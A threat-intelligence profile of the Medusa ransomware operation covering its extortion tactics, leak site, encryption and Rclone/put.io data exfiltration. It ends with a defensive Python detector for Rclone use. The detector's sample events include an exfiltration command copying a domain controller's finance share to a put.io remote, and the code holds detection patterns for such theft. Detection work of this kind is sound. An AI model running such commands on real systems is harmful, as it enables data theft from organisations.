Medusa ransomware is a RaaS operation that emerged in 2022 but gained notoriety in 2023. The group practices double extortion, in which victims' data is stolen and leaked if the ransom is not paid. The group has reportedly demanded between $100,000 and $15 million. The group reportedly gives victims 10 days to pay and charges $10,000 per day if the victim wants to extend the deadline.
There is a similarly named RaaS operation, MedusaLocker; reports on the connection between the two operations are mixed, with many reporters considering them the same. MedusaLocker has been active since at least 2019.
Medusa likely takes its name from the Greek Gorgon of the same name. Medusa is generally portrayed as a woman with living snakes for hair; in mythology, Medusa was cursed so that everything she looked at turned to stone. Within the Medusa binary, the debug path (visible in PEStudio) contains the term "gaze". Additionally, the logo on the group's data leak site is a profile silhouette of Medusa.
Medusa Ransomware’s data leak site includes the following information within a victim’s post:
- Price tag
- Countdown
- Number of visitors
- Victim’s name and description
Additionally, Medusa has been reported to offer options on their posts: a fee of $10,000 to extend the time before the data is leaked, a request to delete the data, and an option to download the data.
Medusa ransomware operators have been reported to leak sensitive data via social media, such as X (formerly Twitter), and via a Telegram channel.
Affiliates of the Medusa ransomware have been observed gaining initial access by exploiting vulnerabilities, through social engineering attacks, and by deploying web shells that then drop the ransomware payload.
Medusa ransomware encrypts the victim's files with AES-256, set up with a 32-byte key and a 16-byte initialization vector, and protects that AES-256 key with RSA asymmetric encryption. If the group names a victim on their data leak site, the post includes the ransom demand, the countdown to the full leak, the number of visitors to the post, and the name and description of the organization. Displaying the visitor count likely increases pressure on the victim by creating the perception that a growing number of people are accessing the sensitive data.
In July 2024, Dark Atlas security researchers identified a security gap in Medusa's infrastructure, which provided additional insight into the group's operations. The researchers were able to access Medusa's cloud account and the data the group had been exfiltrating.
The researchers determined that the group had used Rclone to exfiltrate data from victims. Additionally, the group had used the put.io service to exfiltrate data from the domain controller.
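As an added defensive example (not code from the original report or from the researchers cited), the triage routine below flags Rclone process executions in endpoint telemetry, including a renamed binary recognised by Rclone's `verb remote:path` command-line syntax, and raises the severity when the put.io service appears. The process-creation events and their field names are constructed for illustration.

```python
import re
from typing import Iterable, List, Optional

# Constructed sample process-creation events (not real Medusa telemetry):
# a benign backup job, an rclone run to the put.io service from a domain
# controller, and a renamed rclone binary syncing to an unnamed remote.
SAMPLE_EVENTS = [
    {"host": "DC01", "user": "CORP\\svc_backup",
     "image": r"C:\Program Files\Veeam\Veeam.Backup.exe",
     "cmdline": r"Veeam.Backup.exe /job nightly"},
    {"host": "DC01", "user": "CORP\\admin",
     "image": r"C:\Users\Public\rclone.exe",
     "cmdline": r"rclone.exe copy \\DC01\C$\Shares\Finance putio:exfil --transfers 32"},
    {"host": "WS07", "user": "CORP\\jdoe",
     "image": r"C:\Temp\rc.exe",
     "cmdline": r"rc.exe sync D:\Data remote:backup -q"},
]

# rclone subcommands that move data off the host.
EXFIL_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# An rclone remote looks like "name:path"; two or more letters before the
# colon keeps Windows drive letters such as "D:\Data" from matching.
REMOTE_ARG = re.compile(r"\b([A-Za-z]\w+):(\S*)")
PUTIO = re.compile(r"put\.?io", re.IGNORECASE)


def flag_event(event: dict) -> Optional[dict]:
    """Return a finding for an rclone-like execution, or None if benign."""
    image_name = event["image"].rsplit("\\", 1)[-1]
    tokens = [t.lower() for t in event["cmdline"].split()]
    verb = next((t for t in tokens if t in EXFIL_VERBS), None)
    remotes = [m.group(1) for m in REMOTE_ARG.finditer(event["cmdline"])]
    by_name = re.fullmatch(r"rclone(\.exe)?", image_name, re.IGNORECASE) is not None
    by_syntax = verb is not None and bool(remotes)  # catches renamed binaries
    if not (by_name or by_syntax):
        return None
    reasons = []
    if by_name:
        reasons.append("image name is rclone")
    if by_syntax:
        reasons.append(f"rclone-style '{verb}' to remote(s) {remotes}")
    severity = "high" if PUTIO.search(event["cmdline"]) else "medium"
    return {"host": event["host"], "user": event["user"],
            "severity": severity, "reasons": reasons}


def scan(events: Iterable[dict]) -> List[dict]:
    """Run flag_event over a stream of events and keep the findings."""
    return [f for f in (flag_event(e) for e in events) if f is not None]
```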